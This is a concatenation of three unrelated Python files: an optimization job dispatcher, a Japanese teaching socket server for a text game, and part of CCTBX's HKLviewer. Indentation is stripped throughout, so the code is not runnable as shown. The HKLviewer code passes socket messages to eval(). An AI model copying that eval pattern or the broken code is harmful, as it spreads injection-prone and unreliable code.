app.set_chooser(options.chooser_module,chooser)
debug = (options.verbose == True)
start_web_app = lambda: app.run(debug=debug, port=port, host=options.web_status_host)
proc = multiprocessing.Process(target=start_web_app)
proc.start()
return proc
def main():
(options, args) = parse_args()
if options.job:
job_runner(load_job(options.job))
exit(0)
experiment_config = args[0]
expt_dir = os.path.dirname(os.path.realpath(experiment_config))
log("Using experiment configuration: " + experiment_config)
log("experiment dir: " + expt_dir)
if not os.path.exists(expt_dir):
log("Cannot find experiment directory '%s'. "
"Aborting." % (expt_dir))
sys.exit(-1)
check_experiment_dirs(expt_dir)
# Load up the chooser module.
module = importlib.import_module('chooser.' + options.chooser_module)
chooser = module.init(expt_dir, options.chooser_args)
if options.web_status:
web_proc = start_web_view(options, experiment_config, chooser)
# Load up the job execution driver.
module = importlib.import_module('driver.' + options.driver)
driver = module.init()
# Loop until we run out of jobs.
while attempt_dispatch(experiment_config, expt_dir, chooser, driver, options):
# This is polling frequency. A higher frequency means that the algorithm
# picks up results more quickly after they finish, but also significantly
# increases overhead.
time.sleep(options.polling_time)
# TODO:
# * move check_pending_jobs out of ExperimentGrid, and implement two simple
# driver classes to handle local execution and SGE execution.
# * take cmdline engine arg into account, and submit job accordingly
def attempt_dispatch(expt_config, expt_dir, chooser, driver, options):
log("\n" + "-" * 40)
expt = load_experiment(expt_config)
# Build the experiment grid.
expt_grid = ExperimentGrid(expt_dir,
expt.variable,
options.grid_size,
options.grid_seed)
# Print out the current best function value.
best_val, best_job = expt_grid.get_best()
if best_job >= 0:
log("Current best: %f (job %d)" % (best_val, best_job))
else:
log("Current best: No results returned yet.")
# Gets you everything - NaN for unknown values & durations.
grid, values, durations = expt_grid.get_grid()
# Returns lists of indices.
candidates = expt_grid.get_candidates()
pending = expt_grid.get_pending()
complete = expt_grid.get_complete()
n_candidates = candidates.shape[0]
n_pending = pending.shape[0]
n_complete = complete.shape[0]
log("%d candidates %d pending %d complete" %
(n_candidates, n_pending, n_complete))
# Verify that pending jobs are actually running, and add them back to the
# candidate set if they have crashed or gotten lost.
for job_id in pending:
proc_id = expt_grid.get_proc_id(job_id)
if not driver.is_proc_alive(job_id, proc_id):
log("Set job %d back to pending status." % (job_id))
expt_grid.set_candidate(job_id)
# Track the time series of optimization.
write_trace(expt_dir, best_val, best_job, n_candidates, n_pending, n_complete)
# Print out the best job results
write_best_job(expt_dir, best_val, best_job, expt_grid)
if n_complete >= options.max_finished_jobs:
log("Maximum number of finished jobs (%d) reached."
"Exiting" % options.max_finished_jobs)
return False
if n_candidates == 0:
log("There are no candidates left. Exiting.")
return False
if n_pending >= options.max_concurrent:
log("Maximum number of jobs (%d) pending." % (options.max_concurrent))
return True
else:
# start a bunch of candidate jobs if possible
#to_start = min(options.max_concurrent - n_pending, n_candidates)
#log("Trying to start %d jobs" % (to_start))
#for i in xrange(to_start):
# Ask the chooser to pick the next candidate
log("Choosing next candidate... ")
job_id = chooser.next(grid, values, durations, candidates, pending, complete)
# If the job_id is a tuple, then the chooser picked a new job.
# We have to add this to our grid
if isinstance(job_id, tuple):
(job_id, candidate) = job_id
job_id = expt_grid.add_to_grid(candidate)
log("selected job %d from the grid." % (job_id))
# Convert this back into an interpretable job and add metadata.
job = Job()
job.id = job_id
job.expt_dir = expt_dir
job.name = expt.name
job.language = expt.language
job.status = 'submitted'
job.submit_t = int(time.time())
job.param.extend(expt_grid.get_params(job_id))
save_job(job)
pid = driver.submit_job(job)
if pid != None:
log("submitted - pid = %d" % (pid))
expt_grid.set_submitted(job_id, pid)
else:
log("Failed to submit job!")
log("Deleting job file.")
os.unlink(job_file_for(job))
return True
def write_trace(expt_dir, best_val, best_job,
n_candidates, n_pending, n_complete):
'''Append current experiment state to trace file.'''
trace_fh = open(os.path.join(expt_dir, 'trace.csv'), 'a')
trace_fh.write("%d,%f,%d,%d,%d,%d\n"
% (time.time(), best_val, best_job,
n_candidates, n_pending, n_complete))
trace_fh.close()
def write_best_job(expt_dir, best_val, best_job, expt_grid):
'''Write out the best_job_and_result.txt file containing the top results.'''
best_job_fh = open(os.path.join(expt_dir, 'best_job_and_result.txt'), 'w')
best_job_fh.write("Best result: %f\nJob-id: %d\nParameters: \n" %
(best_val, best_job))
for best_params in expt_grid.get_params(best_job):
best_job_fh.write(str(best_params))
best_job_fh.close()
def check_experiment_dirs(expt_dir):
'''Make output and jobs sub directories.'''
output_subdir = os.path.join(expt_dir, 'output')
check_dir(output_subdir)
job_subdir = os.path.join(expt_dir, 'jobs')
check_dir(job_subdir)
# Cleanup locks and processes on ctl-c
def sigint_handler(signal, frame):
if web_proc:
print "closing web server...",
web_proc.terminate()
print "done"
sys.exit(0)
if __name__=='__main__':
print "setting up signal handler..."
signal.signal(signal.SIGINT, sigint_handler)
main()
|
server_v12.py
|
import socket
from threading import Thread
from lesson12.states.out import OutState
from lesson12_projects.house3.data.state_gen import house3_state_gen
from lesson12_projects.house3.data.const import OUT
class ServerV12:
def __init__(self, transition_doc, host="0.0.0.0", port=5002, message_size=1024):
"""初期化
Parameters
----------
host : str
サーバーのIPアドレス。 規定値 "0.0.0.0"
port : int
サーバー側のポート番号。 規定値 5002
message_size : int
1回の通信で送れるバイト長。 規定値 1024
"""
self._host = host
self._port = port
self._message_size = message_size
# '_s_sock' - (Server socket) このサーバーのTCPソケットです
self._s_sock = None
# '_c_sock_set' - (Client socket set) このサーバーに接続してきたクライアントのソケットの集まりです
self._c_sock_set = None
self._transition_doc = transition_doc
def run(self):
def client_worker(c_sock):
"""クライアントから送信されてくるバイナリデータに対応します
Parameters
----------
c_sock : socket
接続しているクライアントのソケット
"""
c_sock.send(
"""Welcome to Lesson 12 !
----------------------
You can see the house.
You can see the close knob.""".encode()
)
# 最初は外に居ます
state_name = OUT
state = OutState()
while True:
try:
# クライアントから受信したバイナリデータをテキストに変換します
message = c_sock.recv(self._message_size).decode()
# メッセージに応じたアクションを行ったあと、Edge名を返します
edge_name = state.update(message, c_sock)
# Edge名から、次の state名 に変えます
state_name = self._transition_doc['data'][state_name][edge_name]
# ステート名からオブジェクトを生成します
state = house3_state_gen[state_name]()
except Exception as e:
# client no longer connected
# remove it from the set
print(f"[!] Error: {e}")
print(f"Remove a socket")
self._c_sock_set.remove(c_sock)
break
self._c_sock_set = set() # 初期化
s_sock = socket.socket() # このサーバーのTCPソケットの設定を行っていきます
# make the port as reusable port
s_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# ホストとポート番号を設定します
s_sock.bind((self._host, self._port))
# クライアントの同時接続数上限
s_sock.listen(5)
self._s_sock = s_sock
print(f"[*] Listening as {self._host}:{self._port}")
# クライアントからの接続を待ち続けるループです
while True:
print(f"Wait a connection")
# クライアントからの接続があるまで、ここでブロックします
# 'c_sock' - Client socket
# 'c_addr' - Client address
c_sock, c_addr = self._s_sock.accept()
print(f"[+] {c_addr} connected.")
# クライアントの接続を覚えておきます
self._c_sock_set.add(c_sock)
# 別スレッドを開始します
thr = Thread(target=client_worker, args=(c_sock,))
# make the thread daemon so it ends whenever the main thread ends
thr.daemon = True
# start the thread
thr.start()
def clean_up(self):
# クライアントのソケットを閉じます
print("Clean up")
if not (self._c_sock_set is None):
for c_sock in self._c_sock_set:
c_sock.close()
# サーバーのソケットも閉じます
if not (self._s_sock is None):
self._s_sock.close()
|
cmdlineframes.py
|
from __future__ import absolute_import, division, print_function
from iotbx.reflection_file_reader import any_reflection_file
from cctbx.miller import display2 as display
from crys3d.hklviewer import jsview_3d as view_3d
from crys3d.hklviewer.jsview_3d import ArrayInfo
from cctbx import miller
from libtbx.math_utils import roundoff
from libtbx.str_utils import format_value
from cctbx.array_family import flex
from libtbx.utils import Sorry, to_str
from scitbx import matrix
from cctbx import sgtbx
from libtbx import group_args, version
import libtbx
import libtbx.load_env
import traceback
import sys, zmq, threading, time, cmath, zlib, os.path, math, re
NOREFLDATA = "No reflection data has been selected"
class settings_window () :
def set_index_span (self, index_span) :
self._index_span = index_span
def update_reflection_info (self, hkl, d_min, value) :
print(hkl, value)
if (hkl is None) :
self.hkl_info.SetValue("")
self.d_min_info.SetValue("")
self.value_info.SetValue("")
else :
self.hkl_info.SetValue("%d, %d, %d" % hkl)
d_min_str = format_value("%.3g", d_min)
self.d_min_info.SetValue(d_min_str)
value_str = format_value("%.3g", value, replace_none_with="---")
self.value_info.SetValue(value_str)
def clear_reflection_info (self) :
self.update_reflection_info(None, None, None)
class HKLViewFrame() :
def __init__ (self, *args, **kwds) :
self.valid_arrays = []
self.spacegroup_choices = []
self.procarrays = []
self.origarrays = {}
self.merge_answer = [None]
self.dmin = -1
self.settings = display.settings()
self.verbose = 0
if 'verbose' in kwds:
self.verbose = eval(kwds['verbose'])
self.guiSocketPort=None
kwds['settings'] = self.settings
kwds['mprint'] = self.mprint
self.infostr = ""
self.hklfile_history = []
self.tncsvec = None
self.uservectors = []
self.new_miller_array_operations_lst = []
self.copyrightpaths = [("CCTBX copyright", libtbx.env.under_root(os.path.join("modules","cctbx_project","COPYRIGHT.txt"))),
("NGL copyright", libtbx.env.under_dist("crys3d","hklviewer/License_for_NGL.txt")),
("html2canvas copyright", libtbx.env.under_dist("crys3d","hklviewer/LICENSE_for_html2canvas.txt"))
]
self.zmqsleeptime = 0.1
if 'useGuiSocket' in kwds:
self.guiSocketPort = eval(kwds['useGuiSocket'])
self.context = zmq.Context()
self.guisocket = self.context.socket(zmq.PAIR)
self.guisocket.connect("tcp://127.0.0.1:%s" %self.guiSocketPort )
self.STOP = False
self.mprint("CCTBX starting socket thread", 1)
# name this thread to ensure any asyncio functions are called only from main thread
self.msgqueuethrd = threading.Thread(target = self.zmq_listen, name="HKLviewerZmqThread" )
self.msgqueuethrd.daemon = True
kwds['send_info_to_gui'] = self.SendInfoToGUI # function also used by hklview_3d
pyversion = "cctbx.python.version: " + str(sys.version_info[0])
# tell gui what python version we are
self.SendInfoToGUI(pyversion )
self.SendInfoToGUI({"copyrights": self.copyrightpaths,
"cctbxversion": version.get_version()} )
self.mprint("kwds= " +str(kwds), 1)
self.mprint("args= " + str(args), 1)
kwds['websockport'] = self.find_free_port()
kwds['parent'] = self
self.viewer = view_3d.hklview_3d( **kwds )
self.ResetPhilandViewer()
self.idx_data = None
self.NewFileLoaded = False
self.loaded_file_name = ""
self.hklin = None
if 'hklin' in kwds or 'HKLIN' in kwds:
self.hklin = kwds.get('hklin', kwds.get('HKLIN') )
self.LoadReflectionsFile(self.hklin)
if 'useGuiSocket' in kwds:
self.msgqueuethrd.start()
def __exit__(self, exc_type=None, exc_value=0, traceback=None):
self.viewer.__exit__(exc_type, exc_value, traceback)
self.mprint("Destroying HKLViewFrame", verbose=0) # this string is expected by HKLviewer.py so don't change
self.STOP = True
del self
#sys.exit()
def mprint(self, msg, verbose=0):
if verbose <= self.verbose:
if self.guiSocketPort:
self.SendInfoToGUI( { "info": msg } )
else:
print(msg)
def find_free_port(self):
import socket
s = socket.socket()
s.bind(('', 0)) # Bind to a free port provided by the host.
port = s.getsockname()[1]
s.close()
return port
def zmq_listen(self):
#time.sleep(5)
while not self.STOP:
try:
msgstr = self.guisocket.recv().decode("utf-8")
if msgstr == "":
continue
self.mprint("Received string:\n" + msgstr, verbose=1)
msgtype, mstr = eval(msgstr)
if msgtype=="dict":
self.viewer.datatypedict = eval(mstr)
if msgtype=="philstr":
new_phil = libtbx.phil.parse(mstr)
self.update_settings(new_phil)
time.sleep(self.zmqsleeptime)
except Exception as e:
self.mprint( str(e) + traceback.format_exc(limit=10), verbose=1)
self.mprint( "Shutting down zmq_listen() thread", 1)
self.guiSocketPort=None
def ResetPhilandViewer(self, extraphil=None):
self.master_phil = libtbx.phil.parse( masterphilstr )
self.currentphil = self.master_phil
if extraphil:
self.currentphil = self.currentphil.fetch(source = extraphil)
# Don't retain clip plane values as these are specific to each crystal
# so use clip plane parameters from the master phil
default_clipphil = self.master_phil.fetch().extract().clip_plane
currentparms = self.currentphil.extract()
currentparms.clip_plane = default_clipphil
self.currentphil = self.master_phil.format(python_object = currentparms)
self.params = self.currentphil.fetch().extract()
self.viewer.viewerparams = self.params.viewer
self.viewer.params = self.params
self.params.binner_idx = 0
self.params.nbins = 1
self.params.scene_bin_thresholds = ""
self.params.using_space_subgroup = False
self.viewer.symops = []
self.viewer.sg = None
self.viewer.proc_arrays = []
self.viewer.HKLscenedict = {}
self.uservectors = []
self.viewer.visual_symmxs = []
self.visual_symHKLs = []
self.viewer.sceneisdirty = True
self.viewer.isnewfile = True
if self.viewer.miller_array:
self.viewer.params.viewer.scene_id = None
self.viewer.RemoveStageObjects()
self.viewer.miller_array = None
self.viewer.lastviewmtrx = None
return self.viewer.params
def GetNewCurrentPhilFromString(self, philstr, oldcurrentphil):
user_phil = libtbx.phil.parse(philstr)
newcurrentphil = oldcurrentphil.fetch(source = user_phil)
diffphil = oldcurrentphil.fetch_diff(source = user_phil)
return newcurrentphil, diffphil
def GetNewCurrentPhilFromPython(self, pyphilobj, oldcurrentphil):
newcurrentphil, unusedphilparms = oldcurrentphil.fetch(source = pyphilobj, track_unused_definitions=True)
for parm in unusedphilparms:
self.mprint( "Received unrecognised phil parameter: " + parm.path, verbose=1)
diffphil = oldcurrentphil.fetch_diff(source = pyphilobj)
"""
oldcolbintrshld = oldcurrentphil.extract().scene_bin_thresholds
newcolbintrshld = oldcolbintrshld
if hasattr(pyphilobj.extract(), "scene_bin_thresholds"):
newcolbintrshld = pyphilobj.extract().scene_bin_thresholds
# fetch_diff doesn't seem able to correclty spot changes
# in the multiple scope phil object "scene_bin_thresholds"
# Must do it manually
params = newcurrentphil.extract()
if oldcolbintrshld != newcolbintrshld: # or old_binopacities != new_binopacities:
params.scene_bin_thresholds = newcolbintrshld
newcurrentphil = self.master_phil.format(python_object = params)
diffphil = self.master_phil.fetch_diff(source = newcurrentphil)
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
"""
return newcurrentphil, diffphil
def SetCurrentPhilAsPython(self, pyphil):
newphil = master_phil.format(python_object= pyphil)
currphil = master_phil.fetch(source = newphil)
def update_settings(self, new_phil=None):
try:
if not new_phil:
#self.params = self.viewer.params
new_phil = self.master_phil.format(python_object = self.params)
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
self.currentphil, diff_phil = self.GetNewCurrentPhilFromPython(new_phil, self.currentphil)
#diff = None
self.params = self.currentphil.extract()
phl = self.params
if len(diff_phil.all_definitions()) < 1 and not phl.mouse_moved:
self.mprint( "Nothing's changed", verbose=1)
return False
#diff = diff_phil.extract()
self.mprint("diff phil:\n" + diff_phil.as_str(), verbose=1 )
#self.params = self.currentphil.extract()
#phl = self.params
if view_3d.has_phil_path(diff_phil, "use_provided_miller_arrays"):
phl = self.ResetPhilandViewer(self.currentphil)
if not self.load_miller_arrays():
return False
self.viewer.lastscene_id = phl.viewer.scene_id
if view_3d.has_phil_path(diff_phil, "openfilename"):
phl = self.ResetPhilandViewer(self.currentphil)
if not self.load_reflections_file(phl.openfilename):
return False
self.viewer.lastscene_id = phl.viewer.scene_id
if view_3d.has_phil_path(diff_phil, "scene_id", "merge_data", "show_missing", \
"show_only_missing", "show_systematic_absences", "nbins", "binner_idx",\
"scene_bin_thresholds"):
if self.set_scene(phl.viewer.scene_id):
self.update_space_group_choices()
self.set_scene_bin_thresholds(strbinvals=phl.scene_bin_thresholds,
binner_idx=phl.binner_idx,
nbins=phl.nbins )
if phl.spacegroup_choice == None:
self.mprint("! spacegroup_choice == None")
#time.sleep(15)
if view_3d.has_phil_path(diff_phil, "spacegroup_choice"):
self.set_spacegroup_choice(phl.spacegroup_choice)
if view_3d.has_phil_path(diff_phil, "tabulate_miller_array_ids"):
self.tabulate_arrays(phl.tabulate_miller_array_ids)
#return True
if view_3d.has_phil_path(diff_phil, "miller_array_operations"):
self.make_new_miller_array()
if view_3d.has_phil_path(diff_phil, "using_space_subgroup") and phl.using_space_subgroup==False:
self.set_default_spacegroup()
if view_3d.has_phil_path(diff_phil, "shape_primitive"):
self.set_shape_primitive(phl.shape_primitive)
if view_3d.has_phil_path(diff_phil, "add_user_vector_hkl_op",
"add_user_vector_abc",
"add_user_vector_hkl"):
self.add_user_vector()
if view_3d.has_phil_path(diff_phil, "save_image_name"):
self.SaveImageName(phl.save_image_name)
phl.save_image_name = None
if view_3d.has_phil_path(diff_phil, "action"):
ret = self.set_action(phl.action)
phl.action = "is_running" # ensure the same action in succession can be executed
if not ret:
return False
if view_3d.has_phil_path(diff_phil, "savefilename"):
self.SaveReflectionsFile(phl.savefilename)
phl.savefilename = None # ensure the same action in succession can be executed
if view_3d.has_phil_path(diff_phil, "viewer"):
self.viewer.settings = phl.viewer
self.settings = phl.viewer
self.params = self.viewer.update_settings(diff_phil, phl)
if view_3d.has_phil_path(diff_phil, "scene_id", "spacegroup_choice"):
self.list_vectors()
# parameters might have been changed. So update self.currentphil accordingly
self.currentphil = self.master_phil.format(python_object = self.params)
self.NewFileLoaded = False
phl.mouse_moved = False
self.SendCurrentPhilValues()
if (self.viewer.miller_array is None) :
self.mprint( NOREFLDATA, True)
return False
return True
except Exception as e:
self.mprint(to_str(e) + "\n" + traceback.format_exc(), 0)
return False
def update_clicked (self, index) :#hkl, d_min=None, value=None) :
if (index is None) :
self.settings_panel.clear_reflection_info()
else :
hkl, d_min, value = self.viewer.scene.get_reflection_info(index)
self.settings_panel.update_reflection_info(hkl, d_min, value)
def detect_Rfree(self, array):
from iotbx.reflection_file_utils import looks_like_r_free_flags_info
info = array.info()
if (array.is_integer_array()) and (looks_like_r_free_flags_info(info)) :
from iotbx.reflection_file_utils import get_r_free_flags_scores
score_array = get_r_free_flags_scores([array], None)
test_flag_value = score_array.test_flag_values[0]
if test_flag_value not in array.data():
return array # for the few cases where a miller array cannot be considered as a valid Rfree array
array = array.customized_copy(data=(array.data() == test_flag_value))
array.set_info(info)
array._data = array.data().as_int()
return array
def process_miller_array(self, array) :
if (array is None) : return
info = array.info()
if isinstance(info, str) :
labels = "TEST DATA"
else :
labels = info.label_string()
if (array.unit_cell() is None) or (array.space_group() is None) :
raise Sorry("No space group info is present in data")
details = []
self.infostr = ""
array = self.detect_Rfree(array)
sg = "%s" % array.space_group_info()
uc = "a=%g b=%g c=%g angles=%g,%g,%g" % array.unit_cell().parameters()
details_str = ""
if (len(details) > 0) :
details_str = "(%s)" % ", ".join(details)
array_info = group_args(
labels=labels,
details_str=details_str,
merge=self.params.merge_data,
sg=sg,
uc=uc)
return array, array_info
def process_all_miller_arrays(self, col):
self.mprint("Processing reflection data...")
self.procarrays = []
if self.params.merge_data == False:
self.settings.expand_to_p1 = False
self.settings.expand_anomalous = False
for c,arr in enumerate(self.valid_arrays):
procarray, procarray_info = self.process_miller_array(arr)
self.procarrays.append(procarray)
if c==col:
array_info = procarray_info
self.viewer.miller_array = procarray
if col is None:
array_info = procarray_info
return array_info
def set_miller_array(self, col=None) :
if col is not None and col >= len(self.viewer.hkl_scenes_info ):
return
array_info = self.process_all_miller_arrays(col)
self.viewer.set_miller_array(col, merge=array_info.merge,
details=array_info.details_str)
self.viewer.proc_arrays = self.procarrays
self.viewer.identify_suitable_fomsarrays()
def update_space_group_choices(self, col=None) :
if (self.viewer.miller_array is None and col is None) or \
self.params.using_space_subgroup:
return
if col is None:
current_miller_array_idx = self.viewer.HKLInfo_from_dict()[1]
else:
current_miller_array_idx = col
matching_valid_array = self.procarrays[ current_miller_array_idx ]
from cctbx.sgtbx.subgroups import subgroups
from cctbx import sgtbx
sg_info = matching_valid_array.space_group_info()
subgrs = subgroups(sg_info).groups_parent_setting()
self.spacegroup_choices = []
for i,subgroup in enumerate(subgrs) :
subgroup_info = sgtbx.space_group_info(group=subgroup)
self.spacegroup_choices.append(subgroup_info)
for i,e in enumerate(self.spacegroup_choices):
c = None
if str(sg_info) == str(e):
self.current_spacegroup = self.spacegroup_choices[i]
c = i
break
if c is None:
c = 0
self.spacegroup_choices.insert(c, sg_info)
self.current_spacegroup = sg_info
self.params.spacegroup_choice = c
spglst = [e.symbol_and_number() for e in self.spacegroup_choices] + ["original spacegroup"]
mydict = { "spacegroups": spglst }
self.SendInfoToGUI(mydict)
def set_spacegroup_choice(self, n) :
if (self.viewer.miller_array is None) :
raise Sorry("No data loaded!")
if n == len(self.spacegroup_choices): # selected the unmerged "original spacegroup" in the list
self.viewer.proc_arrays = self.procarrays
self.params.using_space_subgroup = False
else:
self.current_spacegroup = self.spacegroup_choices[n]
from cctbx import crystal
symm = crystal.symmetry(
space_group_info= self.current_spacegroup,
unit_cell=self.viewer.miller_array.unit_cell())
othervalidarrays = []
for validarray in self.procarrays:
# TODO: check if array is unmerged i.e. not symmetry unique
arr = validarray.expand_to_p1().customized_copy(crystal_symmetry=symm)
arr = arr.merge_equivalents().array().set_info(validarray.info())
arr = self.detect_Rfree(arr)
othervalidarrays.append( arr )
self.mprint( "MERGING 2", verbose=2)
self.viewer.proc_arrays = othervalidarrays
self.params.using_space_subgroup = True
self.viewer.set_miller_array()
for i,e in enumerate(self.spacegroup_choices):
self.mprint("%d, %s" %(i,e.symbol_and_number()) , verbose=0)
def SetSpaceGroupChoice(self, n):
self.params.spacegroup_choice = n
self.update_settings()
def SetDefaultSpaceGroup(self):
self.params.using_space_subgroup = False
self.update_settings()
def set_default_spacegroup(self):
self.viewer.proc_arrays = self.procarrays
self.viewer.set_miller_array()
self.viewer.identify_suitable_fomsarrays()
def MakeNewMillerArrayFrom(self, operation, label, arrid1, arrid2=None):
# get list of existing new miller arrays and operations if present
miller_array_operations_lst = []
#if self.params.miller_array_operations:
# miller_array_operations_lst = eval(self.params.miller_array_operations)
miller_array_operations_lst = [ ( operation, label, arrid1, arrid2 ) ]
self.params.miller_array_operations = str( miller_array_operations_lst )
self.update_settings()
def make_new_miller_array(self):
miller_array_operations_lst = eval(self.params.miller_array_operations)
unique_miller_array_operations_lst = []
for (operation, label, arrid1, arrid2) in miller_array_operations_lst:
for arr in self.procarrays:
if label in arr.info().labels + [ "", None]:
raise Sorry("Provide an unambiguous label for your new miller array!")
unique_miller_array_operations_lst.append( (operation, label, arrid1, arrid2) )
self.params.miller_array_operations = str(unique_miller_array_operations_lst)
from copy import deepcopy
millarr1 = deepcopy(self.procarrays[arrid1])
newarray = None
if arrid2 != -1:
millarr2 = deepcopy(self.procarrays[arrid2])
newarray = self.viewer.OperateOn2MillerArrays(millarr1, millarr2, operation)
else:
newarray = self.viewer.OperateOn1MillerArray(millarr1, operation)
if newarray is not None:
self.mprint("New dataset has %d reflections." %newarray.size())
newarray.set_info(millarr1._info )
newarray._info.labels = [ label ]
procarray, procarray_info = self.process_miller_array(newarray)
self.procarrays.append(procarray)
self.viewer.proc_arrays = self.procarrays
self.viewer.has_new_miller_array = True
self.viewer.array_infostrs.append( ArrayInfo(procarray, self.mprint).infostr )
self.viewer.array_infotpls.append( ArrayInfo(procarray, self.mprint).infotpl )
#self.viewer.SupersetMillerArrays()
hkls = self.origarrays["HKLs"]
nanarr = flex.double(len(hkls), float("nan"))
m = miller.match_indices(hkls, procarray.indices() )
indices_of_matched_hkls = m.pairs().column(0)
for i,e in enumerate(indices_of_matched_hkls):
nanarr[e] = procarray.data()[i]
self.origarrays[label] = list(nanarr)
mydict = { "array_infotpls": self.viewer.array_infotpls,
"NewHKLscenes" : True,
"NewMillerArray" : True
}
self.SendInfoToGUI(mydict)
def prepare_dataloading(self):
self.viewer.isnewfile = True
#self.params.mergedata = None
self.params.viewer.scene_id = None
self.viewer.colour_scene_id = None
self.viewer.radii_scene_id = None
self.viewer.match_valarrays = []
self.viewer.proc_arrays = {}
self.spacegroup_choices = []
self.origarrays = {}
display.reset_settings()
self.settings = display.settings()
self.viewer.settings = self.params.viewer
self.viewer.mapcoef_fom_dict = {}
self.viewer.sceneid_from_arrayid = []
self.hklfile_history = []
self.tncsvec = None
self.loaded_file_name = ""
def finish_dataloading(self, arrays):
valid_arrays = []
self.viewer.array_infostrs = []
self.viewer.array_infotpls = []
spg = arrays[0].space_group()
uc = arrays[0].unit_cell()
for i,array in enumerate(arrays):
if type(array.data()) == flex.std_string: # in case of status array from a cif file
uniquestrings = list(set(array.data()))
info = array.info()
array = array.customized_copy(data=flex.int([uniquestrings.index(d) for d in array.data()]))
array.set_info(info)
if array.space_group() is None:
array._unit_cell = uc
array._space_group_info = spg.info()
self.mprint("""No unit cell or space group info present in the %d. miller array.
Borrowing them from the first miller array""" %i)
arrayinfo = ArrayInfo(array, self.mprint)
self.viewer.array_infostrs.append( arrayinfo.infostr )
self.viewer.array_infotpls.append( arrayinfo.infotpl )
if i==0:
mydict = { "spacegroup_info": arrayinfo.spginf, "unitcell_info": arrayinfo.ucellinf }
self.SendInfoToGUI(mydict)
valid_arrays.append(array)
self.valid_arrays = valid_arrays
self.mprint("%d Miller arrays in this dataset:" %len(arrays))
for e in self.viewer.array_infostrs:
self.mprint("%s" %e)
self.mprint("\n")
self.NewFileLoaded = True
if (len(valid_arrays) == 0):
msg = "No arrays of the supported types present."
self.mprint(msg)
self.NewFileLoaded=False
elif (len(valid_arrays) >= 1):
self.set_miller_array()
self.update_space_group_choices(0) # get the default spacegroup choice
mydict = { "info": self.infostr,
"array_infotpls": self.viewer.array_infotpls,
"bin_infotpls": self.viewer.bin_infotpls,
"html_url": self.viewer.url,
"tncsvec": self.tncsvec,
"merge_data": self.params.merge_data,
"spacegroups": [e.symbol_and_number() for e in self.spacegroup_choices],
"NewFileLoaded": self.NewFileLoaded,
"file_name": self.params.openfilename
}
self.SendInfoToGUI(mydict)
self.params.openfilename = None
def load_reflections_file(self, file_name):
file_name = to_str(file_name)
ret = False
if (file_name != ""):
try :
self.mprint("Reading file...")
self.prepare_dataloading()
hkl_file = any_reflection_file(file_name)
if hkl_file._file_type == 'cif':
# use new cif label parser for reflections
cifreader = hkl_file.file_content()
cifarrays = cifreader.as_miller_arrays(merge_equivalents=False)
arrays = []
for arr in cifarrays:
if arr.info().labels[-1] not in ['_refln.crystal_id', # avoid these un-displayable arrays
'HKLs','_refln.wavelength_id', '_refln.scale_group_code']:
arrays.append(arr)
# sanitise labels by removing redundant strings.
# remove the data name of this cif file from all labels
dataname = list(hkl_file._file_content.builder._model.keys())
unwantedstrings = dataname[:]
# remove "_refln." from all labels
unwantedstrings.append("_refln.")
unwantedstrings.append("_refln_")
for arr in arrays:
if len(arr.info().labels):
newlabels = []
for label in arr.info().labels:
found = False
for s in unwantedstrings:
if s in label:
newlabel = label.replace(s, "")
found = True
if len(newlabel) > 0:
newlabels.append(newlabel)
break
if not found:
newlabels.append(label)
arr.info().labels = newlabels
ciforigarrays = cifreader.as_original_arrays()[dataname[0]]
self.origarrays = {}
for key in ciforigarrays:
if key not in ['_refln.crystal_id', # avoid these un-displayable arrays
'_refln.wavelength_id', '_refln.scale_group_code']:
self.origarrays[key] = ciforigarrays[key]
# replace ? with nan in self.origarrays to allow sorting tables of data in HKLviewer
for labl in self.origarrays.keys():
origarray = self.origarrays[labl]
for i,e in enumerate(self.origarrays[labl]):
if e=="?":
origarray[i] = "nan"
try:
self.origarrays[labl] = flex.double(origarray)
except Exception as e:
self.origarrays[labl] = origarray
else: # some other type of reflection file than cif
arrays = hkl_file.as_miller_arrays(merge_equivalents=False)
if hkl_file._file_type == 'ccp4_mtz':
self.hklfile_history = list(hkl_file._file_content.history())
self.loaded_file_name = file_name
for e in self.hklfile_history:
if "TNCS NMOL" in e and "VECTOR" in e:
svec = e.split()[-3:]
t1 = float(svec[0])
t2 = float(svec[1])
t3 = float(svec[2])
if (t1*t1 + t2*t2 + t3*t3) > 0.0:
self.tncsvec = (t1, t2, t3)
self.mprint("tNCS vector found in header of mtz file: %s" %str(self.tncsvec) )
from iotbx import mtz
mtzobj = mtz.object(file_name)
nanval = float("nan")
self.origarrays["HKLs"] = mtzobj.extract_miller_indices()
for mtzlbl in mtzobj.column_labels():
col = mtzobj.get_column( mtzlbl )
newarr = col.extract_values_and_selection_valid().values.deep_copy()
for i,b in enumerate(col.extract_values_and_selection_valid().selection_valid):
if not b:
newarr[i] = nanval
self.origarrays[mtzlbl] = list(newarr)
self.finish_dataloading(arrays)
except Exception as e :
self.NewFileLoaded=False
self.mprint("".join(traceback.format_tb(e.__traceback__ )) + e.__repr__())
arrays = []
ret = True
return ret
def LoadReflectionsFile(self, openfilename):
self.params.openfilename = openfilename
self.update_settings()
def load_miller_arrays(self):
ret = False
try:
self.ResetPhilandViewer(self.currentphil)
self.prepare_dataloading()
self.finish_dataloading(self.provided_miller_arrays)
ret = True
except Exception as e :
self.NewFileLoaded=False
self.mprint("".join(traceback.format_tb(e.__traceback__ )) + e.__repr__())
arrays = []
return ret
def LoadMillerArrays(self, marrays):
self.provided_miller_arrays = marrays
self.params.use_provided_miller_arrays = True
self.update_settings()
def SaveReflectionsFile(self, savefilename):
if self.loaded_file_name == savefilename:
self.mprint("Not overwriting currently loaded file. Choose a different name!")
return
self.mprint("Saving file...")
fileextension = os.path.splitext(savefilename)[1]
if fileextension == ".mtz":
mtz1 = self.viewer.proc_arrays[0].as_mtz_dataset(column_root_label= self.viewer.proc_arrays[0].info().labels[0])
for i,arr in enumerate(self.viewer.proc_arrays):
if i==0:
continue
mtz1.add_miller_array(arr, column_root_label=arr.info().labels[0] )
try: # python2 or 3
mtz1.mtz_object().write(savefilename)
except Exception as e:
mtz1.mtz_object().write(savefilename.encode("ascii"))
self.mprint("Miller array(s) saved to: " + savefilename)
elif fileextension == ".cif":
import iotbx.cif
mycif = None
fname = savefilename
fnames = []
def save2cif(filename, mycif):
with open(filename.encode("ascii"), "w") as f:
f.write("data_%s\n#\n" %os.path.splitext(os.path.basename(filename))[0])
print(mycif.cif_block, file= f)
